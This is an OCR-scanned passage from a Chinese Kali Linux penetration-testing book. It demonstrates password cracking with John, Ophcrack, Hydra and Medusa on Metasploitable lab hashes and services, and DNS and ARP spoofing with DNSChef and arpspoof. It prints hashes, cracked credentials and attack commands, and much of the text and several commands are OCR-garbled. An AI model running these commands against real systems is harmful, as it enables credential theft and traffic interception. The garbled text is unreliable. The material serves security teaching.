root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash 
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4sSwFD910:3:3:sys:/dev:/bin/sh 
klog:$1$f2Z VMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klo 
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfac 
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfshfcY e/:108:117:PostgreS( 
administrator,, ,:/var/lib/postgresql:/bin/bash 
user:$1$HESu9xrH$k.0o3G93DGoXliQKkPmUgZ0:1001:1001:justa 
user, 111,,:/home/user:/bin/bash 
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/: 
第 二 个 字段 为 空 的 行 ， 没 有 密码 信息 。 可 删除 这 些 行 以 加 快 密码 破 
解 的 速度 。 
可 使 用 下 述 指令 破解 密码 ， 其 中 ，pass 就 是 再 要 破解 的 密码 文件 ， 
也 就 是 刚刚 合并 处 理 的 那个 文件 。 


# john pass 
如 果 John 程 序 能 够 破解 这 些 密码 ， 它 就 会 把 破解 的 密码 储存 为 
john.pot。 





如 需 碍 看 破解 出 来 的 密码 ， 可 使 用 下 述 指令 。 
# john --Show pass 


在 本 例 中 ，John 快 速 地 破解 出 了 多 个 宅 码 ， 并 返回 图 10.12 所 示 的 信 


| 





JU oO 

root@kali:~/pwd# john pass 

Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x]) 
postgres (postgres) 

user (user) 

msfadmin (msfadmin) 

service (service) 

123456789 (Klog) 

batman (sys) 











图 10.12 
由 下 表 可 见 ，John 成 功 破解 出 了 多 个 密码 。 





用 户 名 Z 码 
postgres postgres 
user user 
msfadmin msfadmin 
service service 
klog 123456789 
SYS batman 


上 述 蜜 人 码 文件 〈pass 文 件 ) 包含 有 7 个 账户 密码 的 信息 ，John 成 功 地 
破解 出 了 其 中 的 6 组 密码 。 它 没 能 快速 破解 出 root 的 密码 。 

如 需 清空 John 程 序 的 缓存 ， 就 要 删除 文件 /root/.john/john.pot。 

要 破解 Windows 密 码 ， 就 要 使 用 pwdump (工具 集 ) 把 SYSTEM 和 
SAM 文 件 中 的 密码 哈 希 值 (LM 和 /或 NTLM 算 法 ) 提取 出 来 。 如 需 了 解 
这 个 工具 集 的 各 球 工 具 ， 请 参见 http:/www. 
openwall.com/passwords/pwdump。 Kali Linux 收 录 了 其 中 的 samdump2 程 
HF. 

接 下 来 ， 我 们 使 用 字典 文件 password Ist 破解 samdump2 导出 的 哈 
硕 信 息 。 此 时 需要 使 用 的 指令 如 下 所 示 。 

# john test-sam --wordlist=password.|st --format=nt 

上 述 指令 的 运行 信息 如 网 10.13 所 示 。 





root@kali:~/pwd# john test-sam --format=nt --wordlist-password.lst 

Loaded 2 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16]) 

passwordO1 (Administrator) 

guesses: 1 time: 0:00:00:00 DONE (Tue Aug 27 22:17:08 2013) c/s: 50.00 trying: password01 
Use the "--show" option to display all of the cracked passwords reliably 





图 10.13 
上 述 信息 表明 ，test-sam 文 件 中 的 管理 员 密 但 如 下 所 示 。 
passwordO1 
然后 我 们 通过 下 述 指令 碍 看 破解 的 结 末 《〈 见 图 10.14) 。 


# john test-sam --format=nt --show 








root@kali:~/pwd# john test-sam --format-nt --show 
dministrator:password01:e52cac67419a9a22c295285c92cd06b4 :b2641aea8eb4c00ede89cd2b7c78f6fb: : : 


1 password hash cracked, 1 left 





图 10.14 
上 述 信息 表明 : John 成 功 破 解 出 了 Windows 主机 的 管理 员 密码 ， 
但 是 它 未 能 破解 出 常规 用 户 tedi 的 密码 。 
6. Johnny 
如 果 您 对 John 程 序 复 杂 的 命令 行 指 令 望 而 却步 ， 那 么 您 可 能 会 喜欢 
它 的 图 形 化 版 本 一 一 Johnny (http://openwall.info/wiki/john/johnny)。 
Johnny 程序 的 图 形 化 界面 非常 友好 ， 您 不 必 在 命令 行 里 逐一 指定 John 程 
序 的 各 个 选项 。 
如 需 司 动 Johnny 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# johnny 
中 令 将 启动 Johnny 的 图 形 化 界面 。 
我 们 使 用 这 个 程序 分 析 前 一 个 例子 中 Metasploitable 2 系统 的 哈 硕 。 
其 分 析 结 果 如 图 10.15 所 示 。 





File Attack Passwords 


T A A ki 














Open Passwd File Open Last Session Start Attack Resume Attack Pause Attack Copy 
9 =F User Password Hash _GECOS 
Passwords 1 root | $1$/avpfB)... [0:0:root:/root:/bin/bash 
| 2 sys batman $1$fUX6BP... 3:3:sys:/dev:/bin/sh 
Options 3 klog 123456789 $1$f2ZVM... 103:104::/home/klog:/bin/false 
E uli |4] msfadmin msfadmin $1$XN10Zj... 1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash 
— |5 postgres postgres $1$Rw35ik.... 108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash 
p> 6 user user $1$HESu9x... 1001:1001 just a user,111,,:/home/user:/bin/bash 
Settings | 7 service service $1$kR3ue7... 1002:1002,,.:/home/service:/bin/bash 
io 
Output 








85% (6/7: 6 cracked, 1 Left) [--formatzmd5] 





图 10.15 


上 述 信息 表明 ，Johnny 破 解 哈 希 的 能 力 和 John 程 序 相 同 。 

7. Ophcrack 

Ophcrack 是 一 球 基 于 彩虹 表 的 破解 工具 。 它 可 破解 LM 和 NTLM 型 
的 Windows 的 密码 哈 希 。 这 球 程 序 有 命令 行 版 本 ， 也 有 图 形 化 界面 的 版 
本 。 因 为 它 属于 彩虹 表 破 解 工 具 ， 所 以 Ophcrack 采 用 的 破解 策略 同样 是 
以 空间 换 时 间 的 策略 。 

Windows NT 和 早期 的 Windows 系统 (包括 2000/XP) 采用 LAN 
Manager (LM) 保存 用 户 密码 的 哈 希 。 如 需 深入 了 解 LM 哈 希 ， 请 参阅 
http://technet.microsoft.com/en-us/library/dd277300.aspx。 

后 来 ， 微 软 推出 了 NT LAN Manager (NTLM) 哈 希 ， 以 替代 LM 哈 
45. NTLM 算法 可 对 账号 进行 认证 ， 并 实现 了 会 话 的 完整 性 和 保密 性 。 
Windows NT SP4 开 始 ，Windows 系 统 开始 逐步 采纳 更 为 安全 的 NTLM v2 
的 算法 。 这 种 新 算法 增强 了 服务 器 和 用 户 之 间 的 认证 功能 。 微 软 已 经 不 
再 推荐 用 户 使 用 NTLM 哈 希 ， 有 具体 原因 请 参见 http:/msdn.microsoft. 
com/en-us/library/cc236715.aspx. 

有 关 NTLM 和 NTLM V2 的 区 别 ， 请 参见 
http://msdn.microsoft.com/en-us/library/cc236701.aspx. 

如 需 在 命令 行 中 启动 Ophcrack 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# ophcrack-cli 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 及 相关 范例 。 

如 需 启 动 Ophcrack GUI， 可 在 终端 中 使 用 下 述 指令 。 

# ophcrack 

上 述 指令 将 会 启动 Ophcrack GUI (图 形 化 界面 )。 

Ophcrack 需要 彩虹 表 才 能 进行 破解 哈 希 。 所 以 ， 我 们 先 要 先 从 其 官 
方 网 站 Chttp://ophcrack.sourceforge.net/tables.php) 下 载 彩 虹 表 。 有 目前 ， 
官方 免费 提供 Windows XP 和 Vista 彩虹 表 。 对 于 字符 集 为 数字 和 英文 大 
小 写字 母 的 密码 、 且 长 度 在 10 一 14 个 字符 以 内 的 种 规 密码 ， 它 的 破解 成 
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以 xp_free_smal 为 例 。 下 载 它 之 后 ， 我 们 将 其 解压 缩 并 把 解压 后 的 


文件 放 进 xp_free_small 目录 。 然 后 Windows XP 的 散 列 文件 以 pwdump 
格式 保存 为 文件 test-sam。 


接 下 来 ， 我 们 使 用 下 述 命令 破解 先前 获取 的 哈 希 。 

# ophcrack -d fast -t fast -f test-sam 

在 运行 期 间 ，Ophcrack 的 提示 信息 如 下 。 

Four hashes have been found in test-sam: 

Opened 4 table(s) from fast. 

Oh Om Os; Found empty password for user tedi (NT hash #1) 

Oh Om 1s; Found password D01 for 2nd LM hash #0 

Oh Om 13s; Found password PASSWOR for 1st LM hash #0in table XP 


free fast #1 at column 4489. 


Oh Om 13s; Found password passwordO1 for user Administrator (NT 


hash #0) 


2/2. 


0h 0m 13s; search (100%); tables: total 4, done 0, using 4; pwd found 
程序 的 运行 结果 如 下 。 

Results: 

username /hash LM password NT password 

Administrator PASSWORDO1 passwordO1 

tedi * empty *** tx empty *** 

可 见 ，Ophcrack 破解 了 相应 用 户 的 所 有 密码 。 

8. Crunch 


Crunch Chttp://sourceforge.net/projects/crunch-wordlist/) 是 一 于 基于 





用 户 标 准 来 创建 密码 字典 〈wordlist) 的 工具 。 密 码 字 典 通常 用 于 暴力 
破解 。 


如 需 局 动 Crunch 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# crunch 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 及 相关 范例 。 

如 果 要 创建 由 字母 组 成 的 密码 长 度 在 5 个 字符 以 内 密码 字典 ， 并 指 
定 密码 字典 的 文件 名 为 5chars.txt， 我 们 可 使 用 下 述 指令 。 

# crunch 1 5 —o 5chars.txt 

上 述 指令 的 输出 内 容 如 图 10.16 所 示 。 


root@kali:~/pwd# crunch 1 5 -o Schars.txt 

Crunch will now generate the following amount of data: 73645520 bytes 
70 MB 

D GB 

B TB 

B PB 

Crunch will now generate the following number of lines: 12356630 

68% 

100% 


110.16 











文件 5chars.txt 的 内 容 如 下 。 
a 
b 


C 


ZZZZX 
ZLLLY 
ZZZZZ 
这 个 文件 的 内 容 表 明 ， 上 述 指令 创建 了 从 a 到 zzzzz 的 各 种 字符 串 ， 
并 将 其 组 织 为 密码 字典 。 
接 下 来 ， 我 们 要 创建 由 小 写字 母 和 数字 组 成 的 密码 长 度 在 4 个 字符 
以 内 的 密码 字典 ， 并 指定 字典 文件 的 文件 名 为 wordlist,lst。 
根据 以 上 需求 ， 我 们 需要 使 用 下 述 指令 。 


# crunch 1 4 -f /usr/share/crunch/charset.lst lalpha-numeric 





-o wordjlist.lst 

上 述 指令 的 输出 内 容 如 下 。 

Crunch will now generate the following amount of data: 8588664 bytes 

8 MB 

0 GB 

0 TB 

0 PB 

Crunch will now generate the following number of lines: 1727604 

10096 

在 我 的 主机 上 执行 上 述 指令 ， 耗 时 大 约 1.5 分 钟 。 密 码 字 典 
wordlist.lst 的 内 容 如 下 。 


10.2.2 {£2 ELR 


前 文 介绍 了 几 款 离线 破解 密码 的 工具 。 本 节 将 介绍 在 线 破解 密码 的 
工具 。 上 所 谓 在 线 破 解 ， 意 味 着 这 类 工具 在 与 被 测 主 机 建立 连接 之 后 才能 
破解 密码 。 

本 市 将 要 介绍 的 工具 可 分 为 以 下 几 类 : 

e 制作 密码 字典 ; 

o 搜索 密码 的 喻 希 值 ; 

e 在 线 密码 破解 工具 。 








本 节 首 先 会 讲解 两 款 根 据 被 测 网 站 信息 制作 密码 字典 的 工具 ， 然 后 
会 介绍 几 球 在 线 人 破解 密码 的 工具 。 

在 线 密码 破解 工具 会 采取 常规 用 户 登 录 的 方式 ， 以 用 户 名 和 密码 登 
录 远 程 主机 的 网 络 服 务 。 它 会 不 断 尝 试 各 种 用 户 名 和 密码 ， 直 到 发 现 正 
确 的 账户 信息 为 止 。 

这 类 工具 存在 暴露 的 风险 。 因 为 测试 主机 会 直接 连接 到 被 测 主机 ， 
所 以 可 能 会 被 对 方 发 现 甚至 会 被 屏蔽 。 因 为 这 些 工 具 使 用 的 是 标准 登录 
过 程 ， 所 以 在 破解 效率 方面 比 离线 攻击 软件 的 效率 更 高 。 

虽然 在 线 攻 击 工具 速度 不 快 ， 也 可 能 触发 帐户 锁定 机 制 ， 但 是 对 于 
SSH. Telnet 和 FTP 这 类 服务 来 说 ， 在 线 攻 击 是 密码 破解 的 唯一 方式 。 
在 进行 在 线 的 密码 攻击 时 ， 务 必 加 倍 小 心 ; 尤其 是 在 攻击 Active 
Directory (AD) 服务 器 的 账 己 时 ， 骏 力 破 解 可 能 会 锁定 所 有 的 域 账 
户 。 要 避免 发 生 锁定 账户 的 情况 ， 不 仅 要 事先 得 看 密码 和 用 户 锁定 策 
略 ， 在 测试 密码 时 最 好 还 要 使 用 同一 个 密码 对 所 有 用 户 名 进行 测试 ( 轮 
换 用 户 名 ， 而 不 是 轮换 密码 ) 。 

1. CeWL 

CeWL (Custom Word List ) 

(http://www.digininja.org/projects/cewl.php) XE — 3X VANE Hii 3 ETH AE 

URL 上 收集 单词 的 工具 。 把 它 收 集 到 的 单词 纳入 密码 字典 ， 可 提高 密码 
破解 工具 〈 例 如 John the Ripper) 的 命中 率 。 

CeWL 程 序 有 很 多 选项 ， 其 中 较为 常用 的 如 下 所 示 。 

e --depth N 或 -d N: 提取 深度 ， 分析 N 级 链接 以 内 的 网 页 内 容 ; te 
取 深 度 的 默认 值 是 2。 

e --min_word_length N 或 -m N: 单词 的 最 小 长 度 ， 少 于 N 个 字符 的 
单词 不 会 被 收录 ; 单词 最 小 长 度 的 默认 值 是 3。 

e --verbose 或 -v: 详细 提示 模式 。 

e —write 或 -w: 设 定 输出 文件 的 文件 名 。 





























如 果 在 运行 CeWL 时 遇 到 Error: zip/zip gem not installed 错 误 ， 那 么 就 
要 使 用 gem install zip/zip 指令 安装 相应 的 功能 

# gem install zip 

Fetching: zip-2.0.2.gem (100%) 

Successfully installed zip-2.0.2 

1 gem installed 

Installing ri documentation for zip-2.0.2... 

Installing RDoc documentation for zip-2.0.2... 

结合 上 述 选项 ， 我 们 使 用 下 述 指令 从 目标 网 站 收集 单词 。 

cewl -w target.txt http://www.target.com 

MS HrZ Zia, BePP os qOuc ee SUB EE a REA SC target.txto TE 
Kali 系 统 里 ， 这 个 文件 位 于 目录 /usrshare/cewl。 

我 们 打开 上 述 目录 里 的 target.txt 文 件 ， 可 以 看 到 下 述 内 容 。 

Device 

dataset 

sauerlo 

Sauer 

agentChange 

ouput 

fileWrite 

oBy 

strips 

mThe 

270 

Specialforces 

Damian 

GoD 


议 ， 


ZERo 

Zine 

Disney 

NOObz 

xThe 

Cracked 

Question 

Marc 

Doudiet 

Swiss 

Strafor 

Electric 

Alchemy 

2. Hydra 

Hydra 是 一 球 猜测 并 破解 用 户 名 和 密码 的 工具 。 它 支持 多 种 网 络 协 
可 破解 HTTP、FTP、POP3 和 SMB 等 协议 的 密码 。 它 会 使 用 字典 并 





行 穷 举 网 络 服务 的 用 户 名 和 和 密码。 默认 情况 下 ， 它 向 目标 主机 友 起 16 个 


FRAT 


连接 同时 进行 多 组 测试 。 

如 需 启 动 Hydra 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# hydra 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 。 

本 例 将 演示 使 用 hydra 程 序 破解 192.168.56.101 的 VNC 服 务 器 的 密 


。 如 果 密 人 码 字 典 的 文件 名 是 password.lst， 我 们 可 使 用 下 述 指令 。 


# hydra -P password.lst 192.168.56.101 vne 
上 述 指令 的 运行 结果 将 如 图 10.17 所 示 。 
上 述 信息 表明 ，Hydra 成 功 地 破解 了 VNC 服务 强 的 密码 。 被 测 服 


务 器 使 用 的 密码 是 password01 和 password。 





root@kali:~# hydra -P password.lst 192.168.56.101 vnc 
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only 


Hydra (http://www.thc.org/thc-hydra) starting at 2014-02-03 09:05:27 
[WARNING] you should set the number of parallel task to 4 for vnc services. 
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), -1 try per task 

[DATA] attacking service vnc on port 5900 

[5900] [vnc] host: 192.168.56.101 login: password: passwordO1l 

[5900] [vnc] host: 192.168.56.101 login: password: password 

1 of 1 target successfully completed, 2 valid passwords found 

[110.17 


下 一 步 工作 就 是 验证 Hydra 破 解 的 密码 。 我 们 可 直接 运行 vncviewer 
程序 ， 使 用 这 些 密码 连接 到 远程 主机 的 VNC 服 务 器 。 


使 用 vncviewer 验 证 密码 的 情况 如 图 10.18 所 示 。 
root@kali:~/pwd# vncviewer 192.168.56.101 
Connected to RFB server, using protocol version 3.3 
Performing standard VNC authentication 
Password: 
Authentication successful 


TightVNC: root's X desktop (metasploitable:O) icles 





























图 10.18 
述 信息 表明 ， 和 破解 的 密码 可 以 连接 到 VNC 服 务 器 ， 而 且 该 密码 还 
具有 ， ToU A ECT! 





Hydra 程 序 有 一 个 对 应 的 GUI 程序 。 


# xhydra 
上 述 指令 将 会 启动 Hydra 的 GTK 图 形 界面 程序 。 使 用 这 个 程序 破解 
SSH 服 务 密码 的 情况 如 图 10.19 所 示 。 











Output 
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only 


Hydra (http://www. thc.org/thc-hydra) starting at 2013-08-29 07:02:31 
[DATA] 3 tasks, 1 server, 3 login tries (l:1/p:3), ~1 try per task 

[DATA] attacking service ssh on port 22 

[VERBOSE] Resolving addresses ... done 

[22][ssh] host: 192.168.56.101 login: msfadmin password: msfadmin 
1 of 1 target successfully completed, 1 valid password found 

Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-29 07:02:34 


«finished» 








Start) [stop] mE ‘Save Output | | Clear Output | Output 


图 10.19 
经 验 表 明 ，xhydra 程 序 不 如 其 命令 行程 序 hydra 那 样 灵 活 ， 不 能 调整 
很 多 设置 。 例 如 ， 在 破解 VNC 服务 时 ，xhydra 无 法 设置 用 户 名 ; 更 为 
不 羊 的 是 ， 它 就 没有 设置 用 户 名 的 功能 。 
3. Medusa 
Medusa 是 另外 一 蒜 在 线 破 解 网 络 服务 密码 的 程序 。 它 具有 速度 快 、 











并 发 性 能 强 和 模板 化 的 特点 。 现 在 ， 它 能 够 通过 相应 模板 破解 CVS、 
FTP, HTTP. IMAP, MS-SQL. MySQL. NCP (NetWare) 、 
PcAnywhere, POP3. PostgreSQL. rexec. Rlogin, rsh. SMB, 
SMTP (VRFY) . SNMP, SSHv2, SVN, Telnet, VmAuthd. VNC} 
DG AUS ANS Sh AK 

有 关 Medusa 和 Hydra 的 具体 区 别 ， 请 参见 
http://foofus.net/goons/jmk/medusa/medusa-compare.html. 

在 实际 的 渗透 测试 工作 中 ， 可 同时 使 用 这 两 款 工 具 、 尽 可 能 地 获取 
被 测 主机 的 各 种 信息 。 

如 需 启 动 Medusa 工 具 ， 可 在 终端 中 使 用 下 述 指令 。 

# medusa 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 。 

Medusa 程 序 有 很 多 选项 ， 其 中 常用 的 一 些 选项 如 下 所 示 。 

o -u 或 -U[FILE]: 指定 用 户 名 或 用 户 名 字典 。 

e -h 或 -HIFILE]: 指定 主机 名 或 主机 名 字典 。 

o -p 或 -PIFILE]: 指定 密码 或 密码 字典 。 

e-M: 配置 测试 所 用 的 模板 的 名 称 。 亦 可 通过 -d 选项 搜索 模板 。 

e-O: 设置 输出 文件 的 文件 名 。 

e-V: 设置 提示 信息 的 详细 程度 。 如 果 使 用 了 -v 4 选项 ， 将 只 能 看 
到 成 功 破解 的 登录 凭据 。 

前 面 ， 我 们 用 Hydra 破 解 了 VNC 服 务 器 的 密码 ;现在 我 们 再 用 
Medusa 作 一 次 相同 的 破解 试验 。 

# medusa -u root -P password.lst -h 192.168.56.101 -M vnc -v 4 

上 述 指令 的 运行 结果 如 下 。 

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 














<jmk@foofus.net> 


ACCOUNT FOUND: [vnc] Host: 192.168.56.101 User: root Password: 


password [SUCCESS ] 
Medusa 只 找到 了 一 个 VNC 密 码 ， 相 比 之 下 ，Hydra 能 够 找到 了 两 个 
VNC 和 密码。 








前 面 介绍 了 多 款 破解 密码 的 工具 。 本 节 将 探索 通过 网 络 欺 骗 的 手段 
提升 权限 的 各 种 方法 。 

网 络 欺 骗 (network spoofing) 泛 指 修改 网 络 数据 的 各 种 手段 。 例 
如 ， 伪 造 MAC 地址、 伪造 耻 地 址 等 的 数据 ， 都 属于 网 络 欺骗 的 范畴 。 
网 络 欺骗 引 在 于 获取 网 络 上 两 个 会 话 主机 的 通信 数据 。 


10.3.1 DNSChef 


DNSChef Chttp://thesprawl.org/projects/dnschef/) 是 一 款 DNS 代 理工 
有 具 。 它 可 蔡 DNS 服 务 器 对 被 测 主机 进行 DNS 回复 ， 把 域名 解析 为 攻击 者 
管控 的 IP， 从 而 让 攻击 者 的 主机 扮演 真正 的 服务 器 的 角色 。DNSChef 的 
这 种 功能 可 用 来 分 析 甚 至 控制 客户 主机 的 网 络 流量 。 

在 使 用 DNSChef 之 前 ， 您 需要 对 被 测 主 机 进行 调整 ， 指 定 DNSChef 
的 主机 为 被 测 主机 的 DNS 服务 器 。 

e 如 果 被 测 主 机 安装 的 是 Linux 系统 ， 那 么 您 应 当 修 
改 /etc/resolv.conf 文件 。 

e 如 果 被 测 主机 安装 的 是 Windows， 您 可 通过 控制 面板 的 网 络 连接 
选项 进行 相应 的 设置 。 

在 没有 权限 更 改 被 测 主机 DNS 服务 器 设置 的 情况 下 ， 您 就 需要 使 
用 其 他 手段 (例如 ARP 欺 骗 并 搭设 一 个 伪 DHCP 服 务 嚣 等) 支持 被 测 主 
机 的 DNS 请 求 。 

本 例 涉及 2 台 主 机 ， 一 台 是 运行 DNSChef 的 主机 ， 其 IP 为 





192.168.2.21; 男 一 台 是 被 测 ( 受 害 人 的 ) 主机 ， 其 IP 是 192.168.2.22。 
简便 起 见 ， 我 们 用 Metasploitable 的 虚拟 机 充当 被 测 主机 。 

首先 ， 我 们 要 对 DNSChef 进 行 设置 。 

1. 设置 为 DNS 代 理 

第 一 步 是 把 DNSChef 设 置 为 DNS 代理 服务 器 。 我 们 要 在 DNSChef 的 
主机 上 运行 下 述 指令 。 

# dnschef 

而 后 调整 这 台 主 机 的 DNS 设 置 ， 使 之 使 用 本 机 (localhost〉 的 DNS 
服务 器 。 

然后 使 用 下 述 命令 查询 google.com 的 DNS 记录 。 

host -t A google.com 

上 述 指令 向 DNSChef 发 起 DNS 查询 ， 应 当 会 显示 图 10.20 所 示 的 信 





EI 


这 种 设置 将 DNSChef 调 整 为 DNS 代理 服务 器 。 它 将 所 有 DNS 解析 请 
求 转发 到 上 游 解 析 服 务 器 。 本 例 中 ， 它 的 上 游 DNS 服 务 器 是 8.8.8.8。 


root@kali:~# dnschef 





| | version 0.1 | | / | 

Hd uu c 

FI eN 57 43. X .] 
FC ESO T e 
aul | A LEX Led 
iphelix@thesprawl . org 


[*] DNS Chef started on interface: 127.0.0.1 

[*] Using the following nameservers: 8.8.8.8 

[*] No parameters were specified. Running in full proxy mode 
[21:08:03] 127.0.0.1: proxying the response of type 'A' for google.com 








10.20 
2. 伪造 域名 记录 
在 伪造 google.com 的 域名 记录 之 前 ， 先 来 看 看 google.com 的 原始 解 
析 结 果 见 图 10.21)〉。 








imsfadmin@metasploitable:~$ host -t ANY google.com 
google.com has address 74.125.235.41 

google.com has address 74.125.235.32 

google.com has address 74.125.235.46 

google.com has address 74.125.235.36 

google.com has address 74.125.235.39 

google.com has address 74.125.235.40 

google.com has address 74.125.235.35 

google.com has address 74.125.235.37 

google.com has address 74.125.235.38 

google.com has address 74.125.235.33 

google.com has address 74.125.235.34 

google.com name server ns2.google.com. 

google.com name server nsl.google.com. 

google.com name server ns3.google.com. 

google.com name server ns4.google.com. 

google.com has SOA record nsl.google.com. dns-admin.google.com. 1530871 7200 1800 1209600 300 
msfadminGmetasploitable:-$ 











图 10.21 

现在 ， 我 们 要 伪造 google.com 有 关 的 DNS 响应 。 和 前 一 个 例子 里 
的 情况 一 样 ， 首 先 要 修改 /etc/resolv.conf 文 件 ， 令 被 测 主机 使 用 DNSChef 
作为 其 DNS 服 务 器 。 

接 下 来 在 DNSChef 所 在 的 主机 上 使 用 下 述 指令 。 

# dnschef --fakeip=192.168.2.21 --fakedomains google.com 

--interface 192.168.2.21 -q 

而 后 我 们 在 被 测 主机 查询 google.com 的 卫 地 址 。 

$ host -t A google.com 

上 述 指令 的 运行 结果 如 下 。 

google.com has address 192.168.2.21 

此 时 ， 运 行 DNSChef 的 主机 将 提示 图 10.22 所 示 的 信息 。 





root@kali:~# dnschef --fakeip-192.168.2.21 --fakedomains google.com --interface 192.168.2.21 -q 
*] DNS Chef started on interface: 192.168.2.21 

*] Using the following nameservers: 8.8.8.8 

*] Cooking replies to point to 192.168.2.21 matching: google.com 

21:17:29] 192.168.2.22: cooking the response of type 'A' for google.com to 192.168.2.21 





图 10.22 
Kali 集 成 的 是 v0.1 版 本 的 DNSChef 程 序 。 这 个 版 本 不 支持 IPv6。 如 
果 和 需要 在 IPv6 的 网 络 中 使 用 这 个 程序 ， 您 需要 将 其 升级 为 ”v0.2 版 
(https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz) . 
如 需 在 IP v6 的 网 络 里 使 用 DNSChef 程 序 ， 就 要 在 指令 行 里 启用 -6 


选项 。 

此 时 ， 域 名 google.com 的 IPv6 的 真正 地 址 是 
2404:6800:4003:802::1003。DNSChef 主 机 的 IPv6 地 址 是 
fe80::a00:27ff:fe1c:5122/64. 

在 DNSChef 服 务 嚣 中， 使 用 下 述 指令 伪造 google.com 的 IPvV6 地 址 。 

dnschef.py -6 --fakeipv6 fe80::a00:27ff:felc:5122 --interface :: -q 


10.3.2 arpspoof 

arpspoof 是 一 款 在 交换 网 络 中 辅助 进行 网 络 监听 的 实用 工具 。 前 文 
提 过 ， 在 使 用 交换 机 进行 数据 交换 的 网 络 环境 里 很 难 进行 网 络 监 听 ， 但 
arpspoof 可 以 辅助 我 们 完成 这 项 任务 。 

arpspoof 用 于 伪造 网 络 中 两 台 设备 的 ARP 通 信 。 

常规 情况 下 ， 当 主机 A 要 和 主机 B〔( 网 关 )〉 进行 通信 的 时 候 ， 主 机 A 
会 广播 ARP 请 求 以 获取 主机 B 的 MAC 地 址 。 此 后 ， 主 机 B 将 会 回应 这 
个 ARP 请求， 在 ARP Reply 数据 包 里 声明 自己 的 MAC 地 址 ; 与 此 同 
时 ， 主 机 B 也 会 将 ARP 广 播 中 主机 A 的 MAC 地 址 记录 下 来 。 此 后 ， 主 机 
A 和 主机 B 才 能 开始 通信 〈( 见 图 10.23) 。 











A (1) ARP Request B 
E> 
(2) ARP Reply 
(3) ARP Request 
———— 
= (4) ARP Reply = 
MAC : 11.11.11.11.11.11 MAC : 22.22.22.22.22.22 





图 10.23 
如 果 攻 击 者 C 想 要 监听 主机 A 和 主机 B 之 间 的 网 络 流 量 ， 则 可 以 向 主 
机 A 发 送 ARP 回 复 ， 告 诉 它 主机 B 使 用 的 是 主机 C 的 MAC 地 址 
(33.33.33.33.33.33) ; 而 后 它 还 要 通告 主机 B, “主机 A 的 MAC 地 址 是 





33.33.33.33.33.33”( 风 图 10.24) o 





MAC : 11.11.1 宇 11.11.11 MAC : 22. £22.22.22.22 


— 
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MAC : 33.33.33.33.33.33 








图 10.24 
在 ARP 欺 骗 生 效 之 后 ， 主 机 A 和 主机 B 之 间 的 所 有 网 络 数据 包 都 会 


通过 主机 C 转 发 。 

在 使 用 arpspoof 之 前 ， 需 要 在 Kali Linux (运行 ARPspoof〉 的 主机 上 
启用 IP 转发 功能 。 这 就 需要 以 root 用 户 的 身份 执行 下 述 指令 。 

# echo 1 > /proc/sys/net/ipv4/ip_forward 

要 通过 指令 行 界面 局 动 arpspoof 程 序 ， 可 在 终端 中 执行 下 述 指令 。 

# arpspoof 

上 述 指令 将 会 在 屏幕 上 显示 程序 的 使 用 说 明 。 

本 例 的 试验 环境 的 具体 情况 如 下 所 示 。 

网 关 的 配置 信息 如 下 。 

e MAC 地 址 : 00-50-56-C0-00-08 

e IP 地 址 : 192.168.65.1 

e TIEI: 255.255.255.0 








被 测 主机 的 配置 如 下 。 
e MAC 地 址 : 00-0C-29-35-C9-CD 
e IP 地 址 : 192.168.65.129 
e FHI: 255.255.255.0 
测试 主机 的 配置 如 下 。 
e MAC 地 址 : 00: OC: 29: 09: 22: 31 
e IP 地 址 : 192.168.65.130 
e FHA: 255.255.255.0 
在 启动 程序 以 前 ， 被 测 主机 的 ARP 缓 存 如 下 所 示 。 
Interface: 192.168.65.129 --- 0x30002 
Internet Address Physical Address Type 
192.168.65.1 00-50-56-c0-00-08 dynamic 
通过 以 下 命令 ， 对 被 测 主 机 实施 ARP 欺 骗 。 
# arpspoof -t 192.168.65.129 192.168.65.1 
在 被 测 主 机 上 稍 等 片刻 ， 然 后 用 ping 命令 测试 网 关 的 连接 情况 。 
被 测 主 机 的 ARP 缓存 很 快 就 就 会 改变 为 下 述 内 容 。 
Interface: 192.168.65.129 --- 0x30002 
Internet Address Physical Address Type 
192.168.65.1 00-0C-29-09-22-31 dynamic 
述 信息 表明 ， 在 被 测 主机 的 ARP 缓 存 里 ， 网 关 的 MAC 地 址 由 00- 
50-56-c0-00-08 改 变 为 00-0C-29-09-22-31。 新 的 MAC 地 址 是 测试 主机 的 
MAC 地 址 。 从 中 可 以 看 出 ， 网 关 对 应 MAC 地 址 已 经 变 成 攻击 者 机 器 的 
MAC 地 址 。 








10.3.3 Ettercap 


Ettercap Chttp://www. wisi eas org/) 是 一 球 在 LAN 中 进行 中 
间 人 攻击 的 工具 集 。 它 通过 ARP 攻 击 充当 网 络 通信 的 中 间 人 。 一 且 ARP 


协议 的 攻击 奏效 ， 它 就 能 够 : 

e 修改 数据 连接 ; 

e 堆 获 FTP、HTTP、POP 和 SSHI1 等 协议 的 密码 ; 

e 通过 伪造 SSL 证 书 的 手段 劫持 被 测 主机 的 HITPS 会 话 。 

